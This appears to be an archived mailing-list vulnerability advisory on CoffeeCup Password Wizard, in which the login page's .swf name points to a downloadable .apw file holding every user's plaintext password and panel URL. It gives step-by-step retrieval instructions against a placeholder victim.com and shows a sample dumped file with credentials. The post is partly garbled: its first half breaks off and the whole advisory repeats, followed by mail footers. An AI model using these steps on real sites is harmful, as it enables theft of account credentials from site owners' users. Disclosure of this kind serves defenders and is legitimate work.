+ Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions
+ Product: CoffeeCup Password Wizard All Versions
+ Vendor: CoffeeCup Software, Inc.
+ Site: http://www.coffeecup.com/java-password/
+ About CoffeeCup Password Wizard: Create unlimited password protected pages
with unlimited usernames and passwords with CoffeeCup Password Wizard.
You don't even have to know Flash, Java, or HTML ! Customize the look and
feel to match your page. You can even point different users to different
URLs ! Preview within the program or your favorite browser. It's all that
easy ! All this and more make CoffeeCup Password Wizard the easiest way
to password protect your pages ! (¿?)
+ Description: Easy obtaining of names of users, passwords and a URL
of direct access to the preferences of the same one.
+ Exploit:
go to the login panel, see sourcecode HTML in search of the location
of the file .swf used to make login.
the file of the passwords is called just as the file of login, but with
the extension .apw
now, go to & download the file:
https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password
Wizard File)
by I complete it opens east file with any text editor and found all the
users
with its passwords and the URL of direct access to its options.
Example of passwords file:
--------- billing.apw -----------
COFFEECUP PASSWORD WIZARD FILE
WWW.COFFEECUP.COM
PLEASE DO NOT EDIT!!!!
MOVIE WIDTH:120
MOVIE HEIGHT:100
MOVIE FRAME RATE:0
MOVIE BK COLOR:$00ECECEC
MOVIE DEFAULT URL:
MOVIE DEFAULT FRAME:
MOVIE SWF NAME:billing.swf
MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
Webs\victim.com\new website project\billingMOVIE FONT NAME:MS Sans Serif
MOVIE FONT SIZE:8
MOVIE FONT COLOR:clBlack
MOVIE TRANSPARENT TRUE
MOVIE VERTICAL TRUE
USER BOX LEFT:2
USER BOX TOP:1
USER BOX WIDTH:116
USER BOX HEIGHT:34
USER BOX CAPTION:Username
Versions
+ Product: CoffeeCup Password Wizard All Versions
+ Vendor: CoffeeCup Software, Inc.
+ Site: http://www.coffeecup.com/java-password/
+ About CoffeeCup Password Wizard: Create unlimited password protected pages
with unlimited usernames and passwords with CoffeeCup Password Wizard.
You don't even have to know Flash, Java, or HTML ! Customize the look and
feel to match your page. You can even point different users to different
URLs ! Preview within the program or your favorite browser. It's all that
easy ! All this and more make CoffeeCup Password Wizard the easiest way
to password protect your pages ! (¿?)
+ Description: Easy obtaining of names of users, passwords and a URL
of direct access to the preferences of the same one.
+ Exploit:
go to the login panel, see sourcecode HTML in search of the location
of the file .swf used to make login.
Example:
Go to
https://www.victim.com/billing/
See sourcecode,
[...]
ID=billing WIDTH=146 HEIGHT=125>
<PARAM NAME=movie VALUE="billing.swf">
<PARAM NAME=quality VALUE=high>
[...]
(https://www.victim.com/billing/billing.swf)
the file of the passwords is called just as the file of login, but with
the extension .apw
now, go to & download the file:
https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password
Wizard File)
by I complete it opens east file with any text editor and found all the
users
with its passwords and the URL of direct access to its options.
Example of passwords file:
--------- billing.apw -----------
COFFEECUP PASSWORD WIZARD FILE
WWW.COFFEECUP.COM
PLEASE DO NOT EDIT!!!!
MOVIE WIDTH:120
MOVIE HEIGHT:100
MOVIE FRAME RATE:0
MOVIE BK COLOR:$00ECECEC
MOVIE DEFAULT URL:
MOVIE DEFAULT FRAME:
MOVIE SWF NAME:billing.swf
MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
Webs\victim.com\new website project\billingMOVIE FONT NAME:MS Sans Serif
MOVIE FONT SIZE:8
MOVIE FONT COLOR:clBlack
MOVIE TRANSPARENT TRUE
MOVIE VERTICAL TRUE
USER BOX LEFT:2
USER BOX TOP:1
USER BOX WIDTH:116
USER BOX HEIGHT:34
USER BOX CAPTION:Username
PASS BOX LEFT:2
PASS BOX TOP:36
PASS BOX WIDTH:116
PASS BOX HEIGHT:34
PASS BOX CAPTION:Password
BUTTON LEFT:15
BUTTON TOP:78
BUTTON WIDTH:90
BUTTON HEIGHT:20
BUTTON PATH:
BUTTON TX:1
BUTTON TY:1
ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
[...]
END
--------- billing.apw -----------
Example of user & pass on billing:
user: anyweb
pass: xnet0305
url option panel: https://www.victim.com/billing/anyweb0001.htm
----------------------------------------------------------------
[EOF]
-----------------------------------------------
Credits: ToOcOoL (http://www.valenciahack.com/)
-----------------------------------------------
--------------------------------
Note: sorry by my bad english ;)
--------------------------------
--
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
[ reply ]